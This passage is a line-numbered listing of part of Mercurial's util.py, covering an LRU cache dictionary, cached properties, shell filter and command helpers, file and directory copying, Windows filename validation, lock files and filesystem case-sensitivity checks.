999 1002 tr.release()
1000 1003
1001 1004 @contextlib.contextmanager
1002 1005 def nullcontextmanager():
1003 1006 yield
1004 1007
1005 1008 class _lrucachenode(object):
1006 1009 """A node in a doubly linked list.
1007 1010
1008 1011 Holds a reference to nodes on either side as well as a key-value
1009 1012 pair for the dictionary entry.
1010 1013 """
1011 1014 __slots__ = (u'next', u'prev', u'key', u'value')
1012 1015
1013 1016 def __init__(self):
1014 1017 self.next = None
1015 1018 self.prev = None
1016 1019
1017 1020 self.key = _notset
1018 1021 self.value = None
1019 1022
1020 1023 def markempty(self):
1021 1024 """Mark the node as emptied."""
1022 1025 self.key = _notset
1023 1026
1024 1027 class lrucachedict(object):
1025 1028 """Dict that caches most recent accesses and sets.
1026 1029
1027 1030 The dict consists of an actual backing dict - indexed by original
1028 1031 key - and a doubly linked circular list defining the order of entries in
1029 1032 the cache.
1030 1033
1031 1034 The head node is the newest entry in the cache. If the cache is full,
1032 1035 we recycle head.prev and make it the new head. Cache accesses result in
1033 1036 the node being moved to before the existing head and being marked as the
1034 1037 new head node.
1035 1038 """
1036 1039 def __init__(self, max):
1037 1040 self._cache = {}
1038 1041
1039 1042 self._head = head = _lrucachenode()
1040 1043 head.prev = head
1041 1044 head.next = head
1042 1045 self._size = 1
1043 1046 self._capacity = max
1044 1047
1045 1048 def __len__(self):
1046 1049 return len(self._cache)
1047 1050
1048 1051 def __contains__(self, k):
1049 1052 return k in self._cache
1050 1053
1051 1054 def __iter__(self):
1052 1055 # We don't have to iterate in cache order, but why not.
1053 1056 n = self._head
1054 1057 for i in range(len(self._cache)):
1055 1058 yield n.key
1056 1059 n = n.next
1057 1060
1058 1061 def __getitem__(self, k):
1059 1062 node = self._cache[k]
1060 1063 self._movetohead(node)
1061 1064 return node.value
1062 1065
1063 1066 def __setitem__(self, k, v):
1064 1067 node = self._cache.get(k)
1065 1068 # Replace existing value and mark as newest.
1066 1069 if node is not None:
1067 1070 node.value = v
1068 1071 self._movetohead(node)
1069 1072 return
1070 1073
1071 1074 if self._size < self._capacity:
1072 1075 node = self._addcapacity()
1073 1076 else:
1074 1077 # Grab the last/oldest item.
1075 1078 node = self._head.prev
1076 1079
1077 1080 # At capacity. Kill the old entry.
1078 1081 if node.key is not _notset:
1079 1082 del self._cache[node.key]
1080 1083
1081 1084 node.key = k
1082 1085 node.value = v
1083 1086 self._cache[k] = node
1084 1087 # And mark it as newest entry. No need to adjust order since it
1085 1088 # is already self._head.prev.
1086 1089 self._head = node
1087 1090
1088 1091 def __delitem__(self, k):
1089 1092 node = self._cache.pop(k)
1090 1093 node.markempty()
1091 1094
1092 1095 # Temporarily mark as newest item before re-adjusting head to make
1093 1096 # this node the oldest item.
1094 1097 self._movetohead(node)
1095 1098 self._head = node.next
1096 1099
1097 1100 # Additional dict methods.
1098 1101
1099 1102 def get(self, k, default=None):
1100 1103 try:
1101 1104 return self._cache[k].value
1102 1105 except KeyError:
1103 1106 return default
1104 1107
1105 1108 def clear(self):
1106 1109 n = self._head
1107 1110 while n.key is not _notset:
1108 1111 n.markempty()
1109 1112 n = n.next
1110 1113
1111 1114 self._cache.clear()
1112 1115
1113 1116 def copy(self):
1114 1117 result = lrucachedict(self._capacity)
1115 1118 n = self._head.prev
1116 1119 # Iterate in oldest-to-newest order, so the copy has the right ordering
1117 1120 for i in range(len(self._cache)):
1118 1121 result[n.key] = n.value
1119 1122 n = n.prev
1120 1123 return result
1121 1124
1122 1125 def _movetohead(self, node):
1123 1126 """Mark a node as the newest, making it the new head.
1124 1127
1125 1128 When a node is accessed, it becomes the freshest entry in the LRU
1126 1129 list, which is denoted by self._head.
1127 1130
1128 1131 Visually, let's make ``N`` the new head node (* denotes head):
1129 1132
1130 1133 previous/oldest <-> head <-> next/next newest
1131 1134
1132 1135 ----<->--- A* ---<->-----
1133 1136 | |
1134 1137 E <-> D <-> N <-> C <-> B
1135 1138
1136 1139 To:
1137 1140
1138 1141 ----<->--- N* ---<->-----
1139 1142 | |
1140 1143 E <-> D <-> C <-> B <-> A
1141 1144
1142 1145 This requires the following moves:
1143 1146
1144 1147 C.next = D (node.prev.next = node.next)
1145 1148 D.prev = C (node.next.prev = node.prev)
1146 1149 E.next = N (head.prev.next = node)
1147 1150 N.prev = E (node.prev = head.prev)
1148 1151 N.next = A (node.next = head)
1149 1152 A.prev = N (head.prev = node)
1150 1153 """
1151 1154 head = self._head
1152 1155 # C.next = D
1153 1156 node.prev.next = node.next
1154 1157 # D.prev = C
1155 1158 node.next.prev = node.prev
1156 1159 # N.prev = E
1157 1160 node.prev = head.prev
1158 1161 # N.next = A
1159 1162 # It is tempting to do just "head" here, however if node is
1160 1163 # adjacent to head, this will do bad things.
1161 1164 node.next = head.prev.next
1162 1165 # E.next = N
1163 1166 node.next.prev = node
1164 1167 # A.prev = N
1165 1168 node.prev.next = node
1166 1169
1167 1170 self._head = node
1168 1171
1169 1172 def _addcapacity(self):
1170 1173 """Add a node to the circular linked list.
1171 1174
1172 1175 The new node is inserted before the head node.
1173 1176 """
1174 1177 head = self._head
1175 1178 node = _lrucachenode()
1176 1179 head.prev.next = node
1177 1180 node.prev = head.prev
1178 1181 node.next = head
1179 1182 head.prev = node
1180 1183 self._size += 1
1181 1184 return node
1182 1185
1183 1186 def lrucachefunc(func):
1184 1187 '''cache most recent results of function calls'''
1185 1188 cache = {}
1186 1189 order = collections.deque()
1187 1190 if func.__code__.co_argcount == 1:
1188 1191 def f(arg):
1189 1192 if arg not in cache:
1190 1193 if len(cache) > 20:
1191 1194 del cache[order.popleft()]
1192 1195 cache[arg] = func(arg)
1193 1196 else:
1194 1197 order.remove(arg)
1195 1198 order.append(arg)
1196 1199 return cache[arg]
1197 1200 else:
1198 1201 def f(*args):
1199 1202 if args not in cache:
1200 1203 if len(cache) > 20:
1201 1204 del cache[order.popleft()]
1202 1205 cache[args] = func(*args)
1203 1206 else:
1204 1207 order.remove(args)
1205 1208 order.append(args)
1206 1209 return cache[args]
1207 1210
1208 1211 return f
1209 1212
1210 1213 class propertycache(object):
1211 1214 def __init__(self, func):
1212 1215 self.func = func
1213 1216 self.name = func.__name__
1214 1217 def __get__(self, obj, type=None):
1215 1218 result = self.func(obj)
1216 1219 self.cachevalue(obj, result)
1217 1220 return result
1218 1221
1219 1222 def cachevalue(self, obj, value):
1220 1223 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1221 1224 obj.__dict__[self.name] = value
1222 1225
1223 1226 def clearcachedproperty(obj, prop):
1224 1227 '''clear a cached property value, if one has been set'''
1225 1228 if prop in obj.__dict__:
1226 1229 del obj.__dict__[prop]
1227 1230
1228 1231 def pipefilter(s, cmd):
1229 1232 '''filter string S through command CMD, returning its output'''
1230 1233 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1231 1234 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1232 1235 pout, perr = p.communicate(s)
1233 1236 return pout
1234 1237
1235 1238 def tempfilter(s, cmd):
1236 1239 '''filter string S through a pair of temporary files with CMD.
1237 1240 CMD is used as a template to create the real command to be run,
1238 1241 with the strings INFILE and OUTFILE replaced by the real names of
1239 1242 the temporary files generated.'''
1240 1243 inname, outname = None, None
1241 1244 try:
1242 1245 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1243 1246 fp = os.fdopen(infd, pycompat.sysstr('wb'))
1244 1247 fp.write(s)
1245 1248 fp.close()
1246 1249 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1247 1250 os.close(outfd)
1248 1251 cmd = cmd.replace('INFILE', inname)
1249 1252 cmd = cmd.replace('OUTFILE', outname)
1250 1253 code = os.system(cmd)
1251 1254 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1252 1255 code = 0
1253 1256 if code:
1254 1257 raise Abort(_("command '%s' failed: %s") %
1255 1258 (cmd, explainexit(code)))
1256 1259 return readfile(outname)
1257 1260 finally:
1258 1261 try:
1259 1262 if inname:
1260 1263 os.unlink(inname)
1261 1264 except OSError:
1262 1265 pass
1263 1266 try:
1264 1267 if outname:
1265 1268 os.unlink(outname)
1266 1269 except OSError:
1267 1270 pass
1268 1271
1269 1272 filtertable = {
1270 1273 'tempfile:': tempfilter,
1271 1274 'pipe:': pipefilter,
1272 1275 }
1273 1276
1274 1277 def filter(s, cmd):
1275 1278 "filter a string through a command that transforms its input to its output"
1276 1279 for name, fn in filtertable.iteritems():
1277 1280 if cmd.startswith(name):
1278 1281 return fn(s, cmd[len(name):].lstrip())
1279 1282 return pipefilter(s, cmd)
1280 1283
1281 1284 def binary(s):
1282 1285 """return true if a string is binary data"""
1283 1286 return bool(s and '\0' in s)
1284 1287
1285 1288 def increasingchunks(source, min=1024, max=65536):
1286 1289 '''return no less than min bytes per chunk while data remains,
1287 1290 doubling min after each chunk until it reaches max'''
1288 1291 def log2(x):
1289 1292 if not x:
1290 1293 return 0
1291 1294 i = 0
1292 1295 while x:
1293 1296 x >>= 1
1294 1297 i += 1
1295 1298 return i - 1
1296 1299
1297 1300 buf = []
1298 1301 blen = 0
1299 1302 for chunk in source:
1300 1303 buf.append(chunk)
1301 1304 blen += len(chunk)
1302 1305 if blen >= min:
1303 1306 if min < max:
1304 1307 min = min << 1
1305 1308 nmin = 1 << log2(blen)
1306 1309 if nmin > min:
1307 1310 min = nmin
1308 1311 if min > max:
1309 1312 min = max
1310 1313 yield ''.join(buf)
1311 1314 blen = 0
1312 1315 buf = []
1313 1316 if buf:
1314 1317 yield ''.join(buf)
1315 1318
1316 1319 Abort = error.Abort
1317 1320
1318 1321 def always(fn):
1319 1322 return True
1320 1323
1321 1324 def never(fn):
1322 1325 return False
1323 1326
1324 1327 def nogc(func):
1325 1328 """disable garbage collector
1326 1329
1327 1330 Python's garbage collector triggers a GC each time a certain number of
1328 1331 container objects (the number being defined by gc.get_threshold()) are
1329 1332 allocated even when marked not to be tracked by the collector. Tracking has
1330 1333 no effect on when GCs are triggered, only on what objects the GC looks
1331 1334 into. As a workaround, disable GC while building complex (huge)
1332 1335 containers.
1333 1336
1334 1337 This garbage collector issue have been fixed in 2.7. But it still affect
1335 1338 CPython's performance.
1336 1339 """
1337 1340 def wrapper(*args, **kwargs):
1338 1341 gcenabled = gc.isenabled()
1339 1342 gc.disable()
1340 1343 try:
1341 1344 return func(*args, **kwargs)
1342 1345 finally:
1343 1346 if gcenabled:
1344 1347 gc.enable()
1345 1348 return wrapper
1346 1349
1347 1350 if pycompat.ispypy:
1348 1351 # PyPy runs slower with gc disabled
1349 1352 nogc = lambda x: x
1350 1353
1351 1354 def pathto(root, n1, n2):
1352 1355 '''return the relative path from one place to another.
1353 1356 root should use os.sep to separate directories
1354 1357 n1 should use os.sep to separate directories
1355 1358 n2 should use "/" to separate directories
1356 1359 returns an os.sep-separated path.
1357 1360
1358 1361 If n1 is a relative path, it's assumed it's
1359 1362 relative to root.
1360 1363 n2 should always be relative to root.
1361 1364 '''
1362 1365 if not n1:
1363 1366 return localpath(n2)
1364 1367 if os.path.isabs(n1):
1365 1368 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1366 1369 return os.path.join(root, localpath(n2))
1367 1370 n2 = '/'.join((pconvert(root), n2))
1368 1371 a, b = splitpath(n1), n2.split('/')
1369 1372 a.reverse()
1370 1373 b.reverse()
1371 1374 while a and b and a[-1] == b[-1]:
1372 1375 a.pop()
1373 1376 b.pop()
1374 1377 b.reverse()
1375 1378 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1376 1379
1377 1380 def mainfrozen():
1378 1381 """return True if we are a frozen executable.
1379 1382
1380 1383 The code supports py2exe (most common, Windows only) and tools/freeze
1381 1384 (portable, not much used).
1382 1385 """
1383 1386 return (safehasattr(sys, "frozen") or # new py2exe
1384 1387 safehasattr(sys, "importers") or # old py2exe
1385 1388 imp.is_frozen(u"__main__")) # tools/freeze
1386 1389
1387 1390 # the location of data files matching the source code
1388 1391 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1389 1392 # executable version (py2exe) doesn't support __file__
1390 1393 datapath = os.path.dirname(pycompat.sysexecutable)
1391 1394 else:
1392 1395 datapath = os.path.dirname(pycompat.fsencode(__file__))
1393 1396
1394 1397 i18n.setdatapath(datapath)
1395 1398
1396 1399 _hgexecutable = None
1397 1400
1398 1401 def hgexecutable():
1399 1402 """return location of the 'hg' executable.
1400 1403
1401 1404 Defaults to $HG or 'hg' in the search path.
1402 1405 """
1403 1406 if _hgexecutable is None:
1404 1407 hg = encoding.environ.get('HG')
1405 1408 mainmod = sys.modules[pycompat.sysstr('__main__')]
1406 1409 if hg:
1407 1410 _sethgexecutable(hg)
1408 1411 elif mainfrozen():
1409 1412 if getattr(sys, 'frozen', None) == 'macosx_app':
1410 1413 # Env variable set by py2app
1411 1414 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1412 1415 else:
1413 1416 _sethgexecutable(pycompat.sysexecutable)
1414 1417 elif (os.path.basename(
1415 1418 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1416 1419 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1417 1420 else:
1418 1421 exe = findexe('hg') or os.path.basename(sys.argv[0])
1419 1422 _sethgexecutable(exe)
1420 1423 return _hgexecutable
1421 1424
1422 1425 def _sethgexecutable(path):
1423 1426 """set location of the 'hg' executable"""
1424 1427 global _hgexecutable
1425 1428 _hgexecutable = path
1426 1429
1427 1430 def _isstdout(f):
1428 1431 fileno = getattr(f, 'fileno', None)
1429 1432 try:
1430 1433 return fileno and fileno() == sys.__stdout__.fileno()
1431 1434 except io.UnsupportedOperation:
1432 1435 return False # fileno() raised UnsupportedOperation
1433 1436
1434 1437 def shellenviron(environ=None):
1435 1438 """return environ with optional override, useful for shelling out"""
1436 1439 def py2shell(val):
1437 1440 'convert python object into string that is useful to shell'
1438 1441 if val is None or val is False:
1439 1442 return '0'
1440 1443 if val is True:
1441 1444 return '1'
1442 1445 return pycompat.bytestr(val)
1443 1446 env = dict(encoding.environ)
1444 1447 if environ:
1445 1448 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1446 1449 env['HG'] = hgexecutable()
1447 1450 return env
1448 1451
1449 1452 def system(cmd, environ=None, cwd=None, out=None):
1450 1453 '''enhanced shell command execution.
1451 1454 run with environment maybe modified, maybe in different dir.
1452 1455
1453 1456 if out is specified, it is assumed to be a file-like object that has a
1454 1457 write() method. stdout and stderr will be redirected to out.'''
1455 1458 try:
1456 1459 stdout.flush()
1457 1460 except Exception:
1458 1461 pass
1459 1462 cmd = quotecommand(cmd)
1460 1463 env = shellenviron(environ)
1461 1464 if out is None or _isstdout(out):
1462 1465 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1463 1466 env=env, cwd=cwd)
1464 1467 else:
1465 1468 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1466 1469 env=env, cwd=cwd, stdout=subprocess.PIPE,
1467 1470 stderr=subprocess.STDOUT)
1468 1471 for line in iter(proc.stdout.readline, ''):
1469 1472 out.write(line)
1470 1473 proc.wait()
1471 1474 rc = proc.returncode
1472 1475 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1473 1476 rc = 0
1474 1477 return rc
1475 1478
1476 1479 def checksignature(func):
1477 1480 '''wrap a function with code to check for calling errors'''
1478 1481 def check(*args, **kwargs):
1479 1482 try:
1480 1483 return func(*args, **kwargs)
1481 1484 except TypeError:
1482 1485 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1483 1486 raise error.SignatureError
1484 1487 raise
1485 1488
1486 1489 return check
1487 1490
1488 1491 # a whilelist of known filesystems where hardlink works reliably
1489 1492 _hardlinkfswhitelist = {
1490 1493 'btrfs',
1491 1494 'ext2',
1492 1495 'ext3',
1493 1496 'ext4',
1494 1497 'hfs',
1495 1498 'jfs',
1496 1499 'NTFS',
1497 1500 'reiserfs',
1498 1501 'tmpfs',
1499 1502 'ufs',
1500 1503 'xfs',
1501 1504 'zfs',
1502 1505 }
1503 1506
1504 1507 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1505 1508 '''copy a file, preserving mode and optionally other stat info like
1506 1509 atime/mtime
1507 1510
1508 1511 checkambig argument is used with filestat, and is useful only if
1509 1512 destination file is guarded by any lock (e.g. repo.lock or
1510 1513 repo.wlock).
1511 1514
1512 1515 copystat and checkambig should be exclusive.
1513 1516 '''
1514 1517 assert not (copystat and checkambig)
1515 1518 oldstat = None
1516 1519 if os.path.lexists(dest):
1517 1520 if checkambig:
1518 1521 oldstat = checkambig and filestat.frompath(dest)
1519 1522 unlink(dest)
1520 1523 if hardlink:
1521 1524 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1522 1525 # unless we are confident that dest is on a whitelisted filesystem.
1523 1526 try:
1524 1527 fstype = getfstype(os.path.dirname(dest))
1525 1528 except OSError:
1526 1529 fstype = None
1527 1530 if fstype not in _hardlinkfswhitelist:
1528 1531 hardlink = False
1529 1532 if hardlink:
1530 1533 try:
1531 1534 oslink(src, dest)
1532 1535 return
1533 1536 except (IOError, OSError):
1534 1537 pass # fall back to normal copy
1535 1538 if os.path.islink(src):
1536 1539 os.symlink(os.readlink(src), dest)
1537 1540 # copytime is ignored for symlinks, but in general copytime isn't needed
1538 1541 # for them anyway
1539 1542 else:
1540 1543 try:
1541 1544 shutil.copyfile(src, dest)
1542 1545 if copystat:
1543 1546 # copystat also copies mode
1544 1547 shutil.copystat(src, dest)
1545 1548 else:
1546 1549 shutil.copymode(src, dest)
1547 1550 if oldstat and oldstat.stat:
1548 1551 newstat = filestat.frompath(dest)
1549 1552 if newstat.isambig(oldstat):
1550 1553 # stat of copied file is ambiguous to original one
1551 1554 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1552 1555 os.utime(dest, (advanced, advanced))
1553 1556 except shutil.Error as inst:
1554 1557 raise Abort(str(inst))
1555 1558
1556 1559 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1557 1560 """Copy a directory tree using hardlinks if possible."""
1558 1561 num = 0
1559 1562
1560 1563 gettopic = lambda: hardlink and _('linking') or _('copying')
1561 1564
1562 1565 if os.path.isdir(src):
1563 1566 if hardlink is None:
1564 1567 hardlink = (os.stat(src).st_dev ==
1565 1568 os.stat(os.path.dirname(dst)).st_dev)
1566 1569 topic = gettopic()
1567 1570 os.mkdir(dst)
1568 1571 for name, kind in listdir(src):
1569 1572 srcname = os.path.join(src, name)
1570 1573 dstname = os.path.join(dst, name)
1571 1574 def nprog(t, pos):
1572 1575 if pos is not None:
1573 1576 return progress(t, pos + num)
1574 1577 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1575 1578 num += n
1576 1579 else:
1577 1580 if hardlink is None:
1578 1581 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1579 1582 os.stat(os.path.dirname(dst)).st_dev)
1580 1583 topic = gettopic()
1581 1584
1582 1585 if hardlink:
1583 1586 try:
1584 1587 oslink(src, dst)
1585 1588 except (IOError, OSError):
1586 1589 hardlink = False
1587 1590 shutil.copy(src, dst)
1588 1591 else:
1589 1592 shutil.copy(src, dst)
1590 1593 num += 1
1591 1594 progress(topic, num)
1592 1595 progress(topic, None)
1593 1596
1594 1597 return hardlink, num
1595 1598
1596 1599 _winreservednames = {
1597 1600 'con', 'prn', 'aux', 'nul',
1598 1601 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1599 1602 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1600 1603 }
1601 1604 _winreservedchars = ':*?"<>|'
1602 1605 def checkwinfilename(path):
1603 1606 r'''Check that the base-relative path is a valid filename on Windows.
1604 1607 Returns None if the path is ok, or a UI string describing the problem.
1605 1608
1606 1609 >>> checkwinfilename(b"just/a/normal/path")
1607 1610 >>> checkwinfilename(b"foo/bar/con.xml")
1608 1611 "filename contains 'con', which is reserved on Windows"
1609 1612 >>> checkwinfilename(b"foo/con.xml/bar")
1610 1613 "filename contains 'con', which is reserved on Windows"
1611 1614 >>> checkwinfilename(b"foo/bar/xml.con")
1612 1615 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1613 1616 "filename contains 'AUX', which is reserved on Windows"
1614 1617 >>> checkwinfilename(b"foo/bar/bla:.txt")
1615 1618 "filename contains ':', which is reserved on Windows"
1616 1619 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1617 1620 "filename contains '\\x07', which is invalid on Windows"
1618 1621 >>> checkwinfilename(b"foo/bar/bla ")
1619 1622 "filename ends with ' ', which is not allowed on Windows"
1620 1623 >>> checkwinfilename(b"../bar")
1621 1624 >>> checkwinfilename(b"foo\\")
1622 1625 "filename ends with '\\', which is invalid on Windows"
1623 1626 >>> checkwinfilename(b"foo\\/bar")
1624 1627 "directory name ends with '\\', which is invalid on Windows"
1625 1628 '''
1626 1629 if path.endswith('\\'):
1627 1630 return _("filename ends with '\\', which is invalid on Windows")
1628 1631 if '\\/' in path:
1629 1632 return _("directory name ends with '\\', which is invalid on Windows")
1630 1633 for n in path.replace('\\', '/').split('/'):
1631 1634 if not n:
1632 1635 continue
1633 1636 for c in _filenamebytestr(n):
1634 1637 if c in _winreservedchars:
1635 1638 return _("filename contains '%s', which is reserved "
1636 1639 "on Windows") % c
1637 1640 if ord(c) <= 31:
1638 1641 return _("filename contains '%s', which is invalid "
1639 1642 "on Windows") % escapestr(c)
1640 1643 base = n.split('.')[0]
1641 1644 if base and base.lower() in _winreservednames:
1642 1645 return _("filename contains '%s', which is reserved "
1643 1646 "on Windows") % base
1644 1647 t = n[-1:]
1645 1648 if t in '. ' and n not in '..':
1646 1649 return _("filename ends with '%s', which is not allowed "
1647 1650 "on Windows") % t
1648 1651
1649 1652 if pycompat.iswindows:
1650 1653 checkosfilename = checkwinfilename
1651 1654 timer = time.clock
1652 1655 else:
1653 1656 checkosfilename = platform.checkosfilename
1654 1657 timer = time.time
1655 1658
1656 1659 if safehasattr(time, "perf_counter"):
1657 1660 timer = time.perf_counter
1658 1661
1659 1662 def makelock(info, pathname):
1660 1663 try:
1661 1664 return os.symlink(info, pathname)
1662 1665 except OSError as why:
1663 1666 if why.errno == errno.EEXIST:
1664 1667 raise
1665 1668 except AttributeError: # no symlink in os
1666 1669 pass
1667 1670
1668 1671 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1669 1672 os.write(ld, info)
1670 1673 os.close(ld)
1671 1674
1672 1675 def readlock(pathname):
1673 1676 try:
1674 1677 return os.readlink(pathname)
1675 1678 except OSError as why:
1676 1679 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1677 1680 raise
1678 1681 except AttributeError: # no symlink in os
1679 1682 pass
1680 1683 fp = posixfile(pathname)
1681 1684 r = fp.read()
1682 1685 fp.close()
1683 1686 return r
1684 1687
1685 1688 def fstat(fp):
1686 1689 '''stat file object that may not have fileno method.'''
1687 1690 try:
1688 1691 return os.fstat(fp.fileno())
1689 1692 except AttributeError:
1690 1693 return os.stat(fp.name)
1691 1694
1692 1695 # File system features
1693 1696
1694 1697 def fscasesensitive(path):
1695 1698 """
1696 1699 Return true if the given path is on a case-sensitive filesystem
1697 1700
1698 1701 Requires a path (like /foo/.hg) ending with a foldable final
1699 1702 directory component.
1700 1703 """
1701 1704 s1 = os.lstat(path)
1702 1705 d, b = os.path.split(path)
1703 1706 b2 = b.upper()
1704 1707 if b == b2:
1705 1708 b2 = b.lower()
1706 1709 if b == b2:
1707 1710 return True # no evidence against case sensitivity
1708 1711 p2 = os.path.join(d, b2)
1709 1712 try:
1710 1713 s2 = os.lstat(p2)
1711 1714 if s2 == s1:
1712 1715 return False
1713 1716 return True
1714 1717 except OSError:
1715 1718 return True
1716 1719
1717 1720 try:
1718 1721 import re2
1719 1722 _re2 = None
1720 1723 except ImportError:
1721 1724 _re2 = False
1722 1725
1723 1726 class _re(object):
1724 1727 def _checkre2(self):
1725 1728 global _re2
1726 1729 try:
1727 1730 # check if match works, see issue3964
1728 1731 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1729 1732 except ImportError:
1730 1733 _re2 = False
1731 1734
1732 1735 def compile(self, pat, flags=0):
1733 1736 '''Compile a regular expression, using re2 if possible
1734 1737
1735 1738 For best performance, use only re2-compatible regexp features. The
1736 1739 only flags from the re module that are re2-compatible are
1737 1740 IGNORECASE and MULTILINE.'''
1738 1741 if _re2 is None:
1739 1742 self._checkre2()
1740 1743 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1741 1744 if flags & remod.IGNORECASE:
1742 1745 pat = '(?i)' + pat
1743 1746 if flags & remod.MULTILINE:
1744 1747 pat = '(?m)' + pat
1745 1748 try:
1746 1749 return re2.compile(pat)
1747 1750 except re2.error:
1748 1751 pass
1749 1752 return remod.compile(pat, flags)
1750 1753
1751 1754 @propertycache
1752 1755 def escape(self):
1753 1756 '''Return the version of escape corresponding to self.compile.
1754 1757
1755 1758 This is imperfect because whether re2 or re is used for a particular
1756 1759 function depends on the flags, etc, but it's the best we can do.
1757 1760 '''
1758 1761 global _re2
1759 1762 if _re2 is None:
1760 1763 self._checkre2()
1761 1764 if _re2:
1762 1765 return re2.escape
1763 1766 else:
1764 1767 return remod.escape
1765 1768
1766 1769 re = _re()
1767 1770
1768 1771 _fspathcache = {}
1769 1772 def fspath(name, root):
1770 1773 '''Get name in the case stored in the filesystem
1771 1774
1772 1775 The name should be relative to root, and be normcase-ed for efficiency.
1773 1776
1774 1777 Note that this function is unnecessary, and should not be
1775 1778 called, for case-sensitive filesystems (simply because it's expensive).
1776 1779
1777 1780 The root should be normcase-ed, too.
1778 1781 '''
1779 1782 def _makefspathcacheentry(dir):
1780 1783 return dict((normcase(n), n) for n in os.listdir(dir))
1781 1784
1782 1785 seps = pycompat.ossep
1783 1786 if pycompat.osaltsep:
1784 1787 seps = seps + pycompat.osaltsep
1785 1788 # Protect backslashes. This gets silly very quickly.
1786 1789 seps.replace('\\','\\\\')
1787 1790 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1788 1791 dir = os.path.normpath(root)
1789 1792 result = []
1790 1793 for part, sep in pattern.findall(name):
1791 1794 if sep:
1792 1795 result.append(sep)
1793 1796 continue
1794 1797
1795 1798 if dir not in _fspathcache:
1796 1799 _fspathcache[dir] = _makefspathcacheentry(dir)
1797 1800 contents = _fspathcache[dir]
1798 1801
1799 1802 found = contents.get(part)
1800 1803 if not found:
1801 1804 # retry "once per directory" per "dirstate.walk" which
1802 1805 # may take place for each patches of "hg qpush", for example
1803 1806 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1804 1807 found = contents.get(part)
1805 1808
1806 1809 result.append(found or part)
1807 1810 dir = os.path.join(dir, part)
1808 1811
1809 1812 return ''.join(result)
1810 1813
1811 1814 def checknlink(testfile):
1812 1815 '''check whether hardlink count reporting works properly'''
1813 1816
1814 1817 # testfile may be open, so we need a separate file for checking to
1815 1818 # work around issue2543 (or testfile may get lost on Samba shares)
1816 1819 f1, f2, fp = None, None, None
1817 1820 try:
1818 1821 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1819 1822 suffix='1~', dir=os.path.dirname(testfile))
1820 1823 os.close(fd)
1821 1824 f2 = '%s2~' % f1[:-2]
1822 1825
1823 1826 oslink(f1, f2)
1824 1827 # nlinks() may behave differently for files on Windows shares if
1825 1828 # the file is open.
1826 1829 fp = posixfile(f2)
1827 1830 return nlinks(f2) > 1
1828 1831 except OSError:
1829 1832 return False
1830 1833 finally:
1831 1834 if fp is not None:
1832 1835 fp.close()
1833 1836 for f in (f1, f2):
1834 1837 try:
1835 1838 if f is not None:
1836 1839 os.unlink(f)
1837 1840 except OSError:
1838 1841 pass
1839 1842
1840 1843 def endswithsep(path):
1841 1844 '''Check path ends with os.sep or os.altsep.'''
1842 1845 return (path.endswith(pycompat.ossep)
1843 1846 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1844 1847
1845 1848 def splitpath(path):
1846 1849 '''Split path by os.sep.
1847 1850 Note that this function does not use os.altsep because this is
1848 1851 an alternative of simple "xxx.split(os.sep)".
1849 1852 It is recommended to use os.path.normpath() before using this
1850 1853 function if need.'''
1851 1854 return path.split(pycompat.ossep)
1852 1855
1853 1856 def gui():
1854 1857 '''Are we running in a GUI?'''
1855 1858 if pycompat.isdarwin:
1856 1859 if 'SSH_CONNECTION' in encoding.environ:
1857 1860 # handle SSH access to a box where the user is logged in
1858 1861 return False
1859 1862 elif getattr(osutil, 'isgui', None):
1860 1863 # check if a CoreGraphics session is available
1861 1864 return osutil.isgui()
1862 1865 else:
1863 1866 # pure build; use a safe default
1864 1867 return True
1865 1868 else:
1866 1869 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1867 1870
1868 1871 def mktempcopy(name, emptyok=False, createmode=None):
1869 1872 """Create a temporary file with the same contents from name
1870 1873
1871 1874 The permission bits are copied from the original file.
1872 1875
1873 1876 If the temporary file is going to be truncated immediately, you
1874 1877 can use emptyok=True as an optimization.
1875 1878
1876 1879 Returns the name of the temporary file.
1877 1880 """
1878 1881 d, fn = os.path.split(name)
1879 1882 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1880 1883 os.close(fd)
1881 1884 # Temporary files are created with mode 0600, which is usually not
1882 1885 # what we want. If the original file already exists, just copy
1883 1886 # its mode. Otherwise, manually obey umask.
1884 1887 copymode(name, temp, createmode)
1885 1888 if emptyok:
1886 1889 return temp
1887 1890 try:
1888 1891 try:
1889 1892 ifp = posixfile(name, "rb")
1890 1893 except IOError as inst:
1891 1894 if inst.errno == errno.ENOENT:
